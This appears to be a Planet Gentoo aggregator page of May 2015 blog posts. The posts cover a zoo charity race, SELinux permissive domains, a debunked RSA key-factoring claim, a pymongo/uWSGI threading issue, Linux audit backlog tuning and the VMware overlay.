Well, it was that time of the year again this past weekend–time for the 2015 St. Louis Children’s Hospital Make Tracks for the Zoo race! This race is always one of my favourite ones of the year, so I was excited to partake in it. There’s always a great turnout (~3500 this year, I believe, but 1644 chipped for the 5K run), and lots of fun, family-oriented activities. One of the best parts is that there are people of all ages, and walks of life (pun intended) who show up to either walk or run to support the amazing Saint Louis Zoo!


2015 St. Louis Make Tracks for the Zoo pre-race line-up
2015 St. Louis Make Tracks for the Zoo – Pre-race
(click to enlarge)

It started out a little iffy this year because there was some substantial rain. Ultimately, though, the rain cleared and the sun started shining in time for the race. The only downside was that the course was pretty slick due to the rain. Despite the slippery course, I did better than expected in terms of time. My total 5K time was 19’06”, according to the chip-timing provided by Big River Running Company (which is a great local running store here in the Saint Louis area). You can see the full results, and sort by whatever criteria you would like by visiting their ChronoTrack site for this race.


2015 St. Louis Make Tracks for the Zoo results
2015 St. Louis Make Tracks for the Zoo results
(click to enlarge)

There were some great runners this year! My time earned me 13th overall, 11th in overall male, and 3rd in my bracket (which is now Male 30-34 [ugh, can't believe I turned 30 this month]). Some really outstanding participants (besides the obvious of the overall winners) this year were Zachary Niemeyer, who at 14 finished 15th overall with a great time of 19’10”, and Norman Jamieson, who at age 79 finished in just over 33 minutes! I’ll be lucky to be able to walk at that age! :-)


2015 St. Louis Make Tracks for the Zoo - Nathan Zachary
Me, tired and sweaty from the humidity, but happy with the experience
(click to enlarge)

So, it was another great year for Make Tracks (especially since it was the 30th year for it), and I’m already looking forward to next year’s race. Hopefully you’ll come and join in a fun time that supports a great establishment!

Cheers,
Zach

P.S. A special thanks to my Pops for not only coming out to support me, but also for snapping the photos above!

May 18, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Testing with permissive domains (May 18, 2015, 11:40 UTC)

When testing out new technologies or new setups, not having (proper) SELinux policies can be a nuisance. Not only are the number of SELinux policies that are available through the standard repositories limited, some of these policies are not even written with the same level of confinement that an administrator might expect. Or perhaps the technology to be tested is used in a completely different manner.

Without proper policies, any attempt to start such a daemon or application might or will cause permission violations. In many cases, developers or users tend to disable SELinux enforcing then so that they can continue playing with the new technology. And why not? After all, policy development is to be done after the technology is understood.

But completely putting the system in permissive mode is overshooting. It is much easier to make a very simple policy to start with, and then mark the domain as a permissive domain. What happens is that the software then, after transitioning into the “simple” domain, is not part of the SELinux enforcements anymore whereas the rest of the system remains in SELinux enforcing mode.

For instance, create a minuscule policy like so:

policy_module(testdom, 1.0)

type testdom_t;
type testdom_exec_t;
init_daemon_domain(testdom_t, testdom_exec_t)

Mark the executable for the daemon as testdom_exec_t (after building and loading the minuscule policy):

~# chcon -t testdom_exec_t /opt/something/bin/daemond

Finally, tell SELinux that testdom_t is to be seen as a permissive domain:

~# semanage permissive -a testdom_t

When finished, don’t forget to remove the permissive bit (semanage permissive -d testdom_t) and unload/remove the SELinux policy module.

And that’s it. If the daemon is now started (through a standard init script) it will run as testdom_t and everything it does will be logged, but not enforced by SELinux. That might even help in understanding the application better.

May 17, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

Keystl;dr News about a broken 4096 bit RSA key are not true. It is just a faulty copy of a valid key.

Earlier today a blog post claiming the factoring of a 4096 bit RSA key was published and quickly made it to the top of Hacker News. The key in question was the PGP key of a well-known Linux kernel developer. I already commented on Hacker News why this is most likely wrong, but I thought I'd write up some more details. To understand what is going on I have to explain some background both on RSA and on PGP keyservers. This by itself is pretty interesting.

RSA public keys consist of two values called N and e. The N value, called the modulus, is the interesting one here. It is the product of two very large prime numbers. The security of RSA relies on the fact that these two numbers are secret. If an attacker would be able to gain knowledge of these numbers he could use them to calculate the private key. That's the reason why RSA depends on the hardness of the factoring problem. If someone can factor N he can break RSA. For all we know today factoring is hard enough to make RSA secure (at least as long as there are no large quantum computers).

Now imagine you have two RSA keys, but they have been generated with bad random numbers. They are different, but one of their primes is the same. That means we have N1=p*q1 and N2=p*q2. In this case RSA is no longer secure, because calculating the greatest common divisor (GCD) of two large numbers can be done very fast with the euclidean algorithm, therefore one can calculate the shared prime value.

It is not only possible to break RSA keys if you have two keys with one shared factors, it is also possible to take a large set of keys and find shared factors between them. In 2012 Arjen Lenstra and his team published a paper using this attack on large scale key sets and at the same time Nadia Heninger and a team at the University of Michigan independently also performed this attack. This uncovered a lot of vulnerable keys on embedded devices, but these were mostly SSH and TLS keys. Lenstra's team however also found two vulnerable PGP keys. For more background you can watch this 29C3 talk by Nadia Heninger, Dan Bernstein and Tanja Lange.

PGP keyservers have been around since quite some time and they have a property that makes them especially interesting for this kind of research: They usually never delete anything. You can add a key to a keyserver, but you cannot remove it, you can only mark it as invalid by revoking it. Therefore using the data from the keyservers gives you a large set of cryptographic keys.

Okay, so back to the news about the supposedly broken 4096 bit key: There is a service called Phuctor where you can upload a key and it'll check it against a set of known vulnerable moduli. This service identified the supposedly vulnerable key.

The key in question has the key id e99ef4b451221121 and belongs to the master key bda06085493bace4. Here is the vulnerable modulus:

c844a98e3372d67f 562bd881da8ea66c a71df16deab1541c e7d68f2243a37665 c3f07d3dd6e651cc d17a822db5794c54 ef31305699a6c77c 043ac87cafc022a3 0a2a717a4aa6b026 b0c1c818cfc16adb aae33c47b0803152 f7e424b784df2861 6d828561a41bdd66 bd220cb46cd288ce 65ccaf9682b20c62 5a84ef28c63e38e9 630daa872270fa15 80cb170bfc492b80 6c017661dab0e0c9 0a12f68a98a98271 82913ff626efddfb f8ae8f1d40da8d13 a90138686884bad1 9db776bb4812f7e3 b288b47114e486fa 2de43011e1d5d7ca 8daf474cb210ce96 2aafee552f192ca0 32ba2b51cfe18322 6eb21ced3b4b3c09 362b61f152d7c7e6 51e12651e915fc9f 67f39338d6d21f55 fb4e79f0b2be4d49 00d442d567bacf7b 6defcd5818b050a4 0db6eab9ad76a7f3 49196dcc5d15cc33 69e1181e03d3b24d a9cf120aa7403f40 0e7e4eca532eac24 49ea7fecc41979d0 35a8e4accea38e1b 9a33d733bea2f430 362bd36f68440ccc 4dc3a7f07b7a7c8f cdd02231f69ce357 4568f303d6eb2916 874d09f2d69e15e6 33c80b8ff4e9baa5 6ed3ace0f65afb43 60c372a6fd0d5629 fdb6e3d832ad3d33 d610b243ea22fe66 f21941071a83b252 201705ebc8e8f2a5 cc01112ac8e43428 50a637bb03e511b2 06599b9d4e8e1ebc eb1e820d569e31c5 0d9fccb16c41315f 652615a02603c69f e9ba03e78c64fecc 034aa783adea213b

In fact this modulus is easily factorable, because it can be divided by 3. However if you look at the master key bda06085493bace4 you'll find another subkey with this modulus:

c844a98e3372d67f 562bd881da8ea66c a71df16deab1541c e7d68f2243a37665 c3f07d3dd6e651cc d17a822db5794c54 ef31305699a6c77c 043ac87cafc022a3 0a2a717a4aa6b026 b0c1c818cfc16adb aae33c47b0803152 f7e424b784df2861 6d828561a41bdd66 bd220cb46cd288ce 65ccaf9682b20c62 5a84ef28c63e38e9 630daa872270fa15 80cb170bfc492b80 6c017661dab0e0c9 0a12f68a98a98271 82c37b8cca2eb4ac 1e889d1027bc1ed6 664f3877cd7052c6 db5567a3365cf7e2 c688b47114e486fa 2de43011e1d5d7ca 8daf474cb210ce96 2aafee552f192ca0 32ba2b51cfe18322 6eb21ced3b4b3c09 362b61f152d7c7e6 51e12651e915fc9f 67f39338d6d21f55 fb4e79f0b2be4d49 00d442d567bacf7b 6defcd5818b050a4 0db6eab9ad76a7f3 49196dcc5d15cc33 69e1181e03d3b24d a9cf120aa7403f40 0e7e4eca532eac24 49ea7fecc41979d0 35a8e4accea38e1b 9a33d733bea2f430 362bd36f68440ccc 4dc3a7f07b7a7c8f cdd02231f69ce357 4568f303d6eb2916 874d09f2d69e15e6 33c80b8ff4e9baa5 6ed3ace0f65afb43 60c372a6fd0d5629 fdb6e3d832ad3d33 d610b243ea22fe66 f21941071a83b252 201705ebc8e8f2a5 cc01112ac8e43428 50a637bb03e511b2 06599b9d4e8e1ebc eb1e820d569e31c5 0d9fccb16c41315f 652615a02603c69f e9ba03e78c64fecc 034aa783adea213b

You may notice that these look pretty similar. But they are not the same. The second one is the real subkey, the first one is just a copy of it with errors.

If you run a batch GCD analysis on the full PGP key server data you will find a number of such keys (Nadia Heninger has published code to do a batch GCD attack). I don't know how they appear on the key servers, I assume they are produced by network errors, harddisk failures or software bugs. It may also be that someone just created them in some experiment.

The important thing is: Everyone can generate a subkey to any PGP key and upload it to a key server. That's just the way the key servers work. They don't check keys in any way. However these keys should pose no threat to anyone. The only case where this could matter would be a broken implementation of the OpenPGP key protocol that does not check if subkeys really belong to a master key.

However you won't be able to easily import such a key into your local GnuPG installation. If you try to fetch this faulty sub key from a key server GnuPG will just refuse to import it. The reason is that every sub key has a signature that proves that it belongs to a certain master key. For those faulty keys this signature is obviously wrong.

Now here's my personal tie in to this story: Last year I started a project to analyze the data on the PGP key servers. And at some point I thought I had found a large number of vulnerable PGP keys – including the key in question here. In a rush I wrote a mail to all people affected. Only later I found out that something was not right and I wrote to all affected people again apologizing. Most of the keys I thought I had found were just faulty keys on the key servers.

The code I used to parse the PGP key server data is public, I also wrote a background paper and did a talk at the BsidesHN conference.

May 14, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Well, sometimes there is a mistake so blatantly obvious on a website that it just has to be shared with others. I was looking at the Material Safety Data Sheets from Exxon Mobil (don’t ask; I was just interested in seeing the white paper on Mobil jet oil), and I noticed something rather strange in the drop-down menu:



Click for a larger version

Yup, apparently now Africa is a country. Funny, all this time I thought it was a continent. Interestingly enough, you can see that they did list Angola and Botswana as countries. Countries within countries—either very meta, or along the lines of country-ception (oh the double entendre), but I digress…

Cheers,
Zach

May 13, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
uWSGI, gevent and pymongo 3 threads mayhem (May 13, 2015, 14:56 UTC)

This is a quick heads-up post about a behaviour change when running a gevent based application using the new pymongo 3 driver under uWSGI and its gevent loop.

I was naturally curious about testing this brand new and major update of the python driver for mongoDB so I just played it dumb : update and give a try on our existing code base.

The first thing I noticed instantly is that a vast majority of our applications were suddenly unable to reload gracefully and were force killed by uWSGI after some time !

worker 1 (pid: 9839) is taking too much time to die...NO MERCY !!!

uWSGI’s gevent-wait-for-hub

All our applications must be able to be gracefully reloaded at any time. Some of them are spawning quite a few greenlets on their own so as an added measure of making sure we never loose any running greenlet we use the gevent-wait-for-hub option, which is described as follow :

wait for gevent hub's death instead of the control greenlet

… which does not mean a lot but is explained in a previous uWSGI changelog :

During shutdown only the greenlets spawned by uWSGI are taken in account,
and after all of them are destroyed the process will exit.

This is different from the old approach where the process wait for
ALL the currently available greenlets (and monkeypatched threads).

If you prefer the old behaviour just specify the option gevent-wait-for-hub

pymongo 3

Compared to its previous 2.x versions, one of the overall key aspect of the new pymongo 3 driver is its intensive usage of threads to handle server discovery and connection pools.

Now we can relate this very fact to the gevent-wait-for-hub behaviour explained above :

the process wait for ALL the currently available greenlets
(and monkeypatched threads)

This explained why our applications were hanging until the reload-mercy (force kill) timeout option of uWSGI hit the fan !

conclusion

When using pymongo 3 with the gevent-wait-for-hub option, you have to keep in mind that all of pymongo’s threads (so monkey patched threads) are considered as active greenlets and will thus be waited for termination before uWSGI recycles the worker !

Two options come in mind to handle this properly :

  1. stop using the gevent-wait-for-hub option and change your code to use a gevent pool group to make sure that all of your important greenlets are taken care of when a graceful reload happens (this is how we do it today, the gevent-wait-for-hub option usage was just over protective for us).
  2. modify your code to properly close all your pymongo connections on graceful reloads.

Hope this will save some people the trouble of debugging this ;)

May 10, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Audit buffering and rate limiting (May 10, 2015, 12:18 UTC)

Be it because of SELinux experiments, or through general audit experiments, sometimes you’ll get in touch with a message similar to the following:

audit: audit_backlog=321 > audit_backlog_limit=320
audit: audit_lost=44395 audit_rate_limit=0 audit_backlog_limit=320
audit: backlog limit exceeded

The message shows up when certain audit events could not be logged through the audit subsystem. Depending on the system configuration, they might be either ignored, sent through the kernel logging infrastructure or even have the system panic. And if the messages are sent to the kernel log then they might show up, but even that log has its limitations, which can lead to output similar to the following:

__ratelimit: 53 callbacks suppressed

In this post, I want to give some pointers in configuring the audit subsystem as well as understand these messages…

There is auditd and kauditd

If you take a look at the audit processes running on the system, you’ll notice that (assuming Linux auditing is used of course) two processes are running:

# ps -ef | grep audit
root      1483     1  0 10:11 ?        00:00:00 /sbin/auditd
root      1486     2  0 10:11 ?        00:00:00 [kauditd]

The /sbin/auditd daemon is the user-space audit daemon. It registers itself with the Linux kernel audit subsystem (through the audit netlink system), which responds with spawning the kauditd kernel thread/process. The fact that the process is a kernel-level one is why the kauditd is surrounded by brackets in the ps output.

Once this is done, audit messages are communicated through the netlink socket to the user-space audit daemon. For the detail-oriented people amongst you, look for the kauditd_send_skb() method in the kernel/audit.c file. Now, generated audit event messages are not directly relayed to the audit daemon – they are first queued in a sort-of backlog, which is where the backlog-related messages above come from.

Audit backlog queue

In the kernel-level audit subsystem, a socket buffer queue is used to hold audit events. Whenever a new audit event is received, it is logged and prepared to be added to this queue. Adding to this queue can be controlled through a few parameters.

The first parameter is the backlog limit. Be it through a kernel boot parameter (audit_backlog_limit=N) or through a message relayed by the user-space audit daemon (auditctl -b N), this limit will ensure that a queue cannot grow beyond a certain size (expressed in the amount of messages). If an audit event is logged which would grow the queue beyond this limit, then a failure occurs and is handled according to the system configuration (more on that later).

The second parameter is the rate limit. When more audit events are logged within a second than set through this parameter (which can be controlled through a message relayed by the user-space audit system, using auditctl -r N) then those audit events are not added to the queue. Instead, a failure occurs and is handled according to the system configuration.

Only when the limits are not reached is the message added to the queue, allowing the user-space audit daemon to consume those events and log those according to the audit configuration. There are some good resources on audit configuration available on the Internet. I find this SuSe chapter worth reading, but many others exist as well.

There is a useful command related to the subject of the audit backlog queue. It queries the audit subsystem for its current status:

# auditctl -s
AUDIT_STATUS: enabled=1 flag=1 pid=1483 rate_limit=0 backlog_limit=8192 lost=3 backlog=0

The command displays not only the audit state (enabled or not) but also the settings for rate limits (on the audit backlog) and backlog limit. It also shows how many events are currently still waiting in the backlog queue (which is zero in our case, so the audit user-space daemon has properly consumed and logged the audit events).

Failure handling

If an audit event cannot be logged, then this failure needs to be resolved. The Linux audit subsystem can be configured do either silently discard the message, switch to the kernel log subsystem, or panic. This can be configured through the audit user-space (auditctl -f [0..2]), but is usually left at the default (which is 1, being to switch to the kernel log subsystem).

Before that is done, the message is displayed which reveals the cause of the failure handling:

audit: audit_backlog=321 > audit_backlog_limit=320
audit: audit_lost=44395 audit_rate_limit=0 audit_backlog_limit=320
audit: backlog limit exceeded

In this case, the backlog queue was set to contain at most 320 entries (which is low for a production system) and more messages were being added (the Linux kernel in certain cases allows to have a few more entries than configured for performance and consistency reasons). The number of events already lost is displayed, as well as the current limitation settings. The message “backlog limit exceeded” can be “rate limit exceeded” if that was the limitation that was triggered.

Now, if the system is not configured to silently discard it, or to panic the system, then the “dropped” messages are sent to the kernel log subsystem. The calls however are also governed through a configurable limitation: it uses a rate limit which can be set through sysctl:

# sysctl -a | grep kernel.printk_rate
kernel.printk_ratelimit = 5
kernel.printk_ratelimit_burst = 10

In the above example, this system allows one message every 5 seconds, but does allow a burst of up to 10 messages at once. When the rate limitation kicks in, then the kernel will log (at most one per second) the number of suppressed events:

[40676.545099] __ratelimit: 246 callbacks suppressed

Although this limit is kernel-wide, not all kernel log events are governed through it. It is the caller subsystem (in our case, the audit subsystem) which is responsible for having its events governed through this rate limitation or not.

Finishing up

Before waving goodbye, I would like to point out that the backlog queue is a memory queue (and not on disk, Red Hat), just in case it wasn’t obvious. Increasing the queue size can result in more kernel memory consumption. Apparently, a practical size estimate is around 9000 bytes per message. On production systems, it is advised not to make this setting too low. I personally set it to 8192.

Lost audit events might result in difficulties for troubleshooting, which is the case when dealing with new or experimental SELinux policies. It would also result in missing security-important events. It is the audit subsystem, after all. So tune it properly, and enjoy the power of Linux’ audit subsystem.

May 09, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Reviving Gentoo VMware support (May 09, 2015, 23:41 UTC)

Sadly over the last months the support for VMware Workstation and friends in Gentoo dropped a lot. Why? Well, I was the only developer left who cared, and it's definitely not at the top of my Gentoo priorities list. To be honest that has not really changed. However... let's try to harness the power of the community now.

I've pushed a mirror of the Gentoo vmware overlay to Github, see


If you have improvements, version bumps, ... - feel free to generate pull requests. Everything related to VMware products is acceptable. I hope some more people will over time sign up and help merging. Just be careful when using the overlay, it likely won't get the same level of review as ebuilds in the main tree.